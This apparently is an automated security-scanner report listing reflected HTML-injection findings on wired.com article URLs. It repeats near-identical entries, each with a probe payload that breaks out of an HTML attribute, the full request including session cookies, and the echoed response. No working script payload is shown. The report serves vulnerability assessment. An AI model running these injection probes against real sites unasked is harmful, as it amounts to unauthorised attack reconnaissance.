GET /science/discoveries/news106cc"><a>40e21ea45df/2007/11/dayintech_1105 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:20:21 GMT Date: Sun, 21 Nov 2010 23:10:21 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_news106cc"><a>40e21ea45df"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b3f5"><a>0ed0fcf84fd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science2b3f5"><a>0ed0fcf84fd/discoveries/news/2007/11/dayintech_1112 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:19:30 GMT Date: Sun, 21 Nov 2010 23:09:30 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science2b3f5"><a>0ed0fcf84fd ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad12b"><a>fc633443f33 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveriesad12b"><a>fc633443f33/news/2007/11/dayintech_1112 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:19:53 GMT Date: Sun, 21 Nov 2010 23:09:53 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveriesad12b"><a>fc633443f33 c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 483e8"><a>03a3277457 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news483e8"><a>03a3277457/2007/11/dayintech_1112 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29319 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:20:11 GMT Date: Sun, 21 Nov 2010 23:10:11 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_news483e8"><a>03a3277457"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cdf3d"><a>d84d2d33c95 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /sciencecdf3d"><a>d84d2d33c95/discoveries/news/2007/11/dayintech_1119 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:19:26 GMT Date: Sun, 21 Nov 2010 23:09:26 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_sciencecdf3d"><a>d84d2d33c95 ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5c14"><a>76302bf60a4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveriese5c14"><a>76302bf60a4/news/2007/11/dayintech_1119 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:19:49 GMT Date: Sun, 21 Nov 2010 23:09:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveriese5c14"><a>76302bf60a4 c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b016"><a>8b57ac5dea6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news4b016"><a>8b57ac5dea6/2007/11/dayintech_1119 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:20:07 GMT Date: Sun, 21 Nov 2010 23:10:07 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_news4b016"><a>8b57ac5dea6"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d4ab"><a>01007bb9cc7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science9d4ab"><a>01007bb9cc7/discoveries/news/2007/11/dayintech_1127 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:19:37 GMT Date: Sun, 21 Nov 2010 23:09:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science9d4ab"><a>01007bb9cc7 ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a068"><a>8c766f25078 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries5a068"><a>8c766f25078/news/2007/11/dayintech_1127 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:20:03 GMT Date: Sun, 21 Nov 2010 23:10:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries5a068"><a>8c766f25078 c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70d5e"><a>47d8c564ba0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news70d5e"><a>47d8c564ba0/2007/11/dayintech_1127 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:20:24 GMT Date: Sun, 21 Nov 2010 23:10:24 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_news70d5e"><a>47d8c564ba0"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58f65"><a>a1751845344 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science58f65"><a>a1751845344/discoveries/news/2007/11/wiredscience HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29319 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:19:23 GMT Date: Sun, 21 Nov 2010 23:09:23 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science58f65"><a>a1751845344 ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 995c5"><a>fe13073f8eb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries995c5"><a>fe13073f8eb/news/2007/11/wiredscience HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29319 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:19:40 GMT Date: Sun, 21 Nov 2010 23:09:40 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries995c5"><a>fe13073f8eb c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9994"><a>6e128528801 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/newse9994"><a>6e128528801/2007/11/wiredscience HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29319 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:19:58 GMT Date: Sun, 21 Nov 2010 23:09:58 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_newse9994"><a>6e128528801"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb7bd"><a>1e8eec37d12 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /sciencebb7bd"><a>1e8eec37d12/discoveries/news/2007/12/dayintech_1217 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:07 GMT Date: Sun, 21 Nov 2010 23:11:07 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_sciencebb7bd"><a>1e8eec37d12 ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d62a"><a>5c65a610 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries6d62a"><a>5c65a610/news/2007/12/dayintech_1217 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29315 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:23 GMT Date: Sun, 21 Nov 2010 23:11:23 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries6d62a"><a>5c65a610 c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43dd8"><a>9084cb4edf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news43dd8"><a>9084cb4edf/2007/12/dayintech_1217 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29319 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:33 GMT Date: Sun, 21 Nov 2010 23:11:33 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_news43dd8"><a>9084cb4edf"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 266e8"><a>afe4e6938d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science266e8"><a>afe4e6938d/discoveries/news/2008/02/dayintech_0226 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29319 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:22:08 GMT Date: Sun, 21 Nov 2010 23:12:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science266e8"><a>afe4e6938d ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1030"><a>70ba086e197 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveriesb1030"><a>70ba086e197/news/2008/02/dayintech_0226 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:22:25 GMT Date: Sun, 21 Nov 2010 23:12:25 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveriesb1030"><a>70ba086e197 c_news"> ...[SNIP]...
